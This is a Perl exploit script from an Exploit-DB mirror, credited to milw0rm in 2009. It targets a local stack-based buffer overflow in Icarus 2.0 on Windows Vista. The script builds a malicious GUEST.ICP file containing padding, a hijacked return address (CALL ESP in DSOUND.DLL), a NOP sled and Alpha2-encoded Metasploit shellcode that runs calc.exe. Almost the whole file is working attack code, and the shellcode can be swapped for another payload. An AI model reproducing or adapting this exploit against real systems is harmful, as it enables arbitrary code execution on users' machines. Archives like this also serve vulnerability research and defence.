exploit-db-mirror/exploits/windows/local/9146.pl

#!/usr/bin/perl
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
# By : [0]x80->[H]4x²0r									     #
# Contact : hashteck[at]Gmail[dot]com						             #
# From : Morocco									     #
# PoC by : ThE g0bL!N									     #
#[+]--------------------------------------------------------------------------------------[+]#
# Program : Icarus 2.0  								     #
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit 6.0 Vista Pro							     #
#[+]--------------------------------------------------------------------------------------[+]#
##############################################################################################
#####################################  Proud to be HACKER  ###################################
##############################################################################################
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
#											     #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
#											     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded 	     #
# Shellcode . I'm too lazy to figure that out now , i you find something contact me !	     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#


$Header="server=" ;
$junk="\x41" x 528;
$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
$NOPS = "\x90" x 20 ;
# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
#
#
#
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk.$EIP.$NOPS.$shellcode;

#----------------------------------------------------------------------------------#
# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
#----------------------------------------------------------------------------------#

# milw0rm.com [2009-07-14]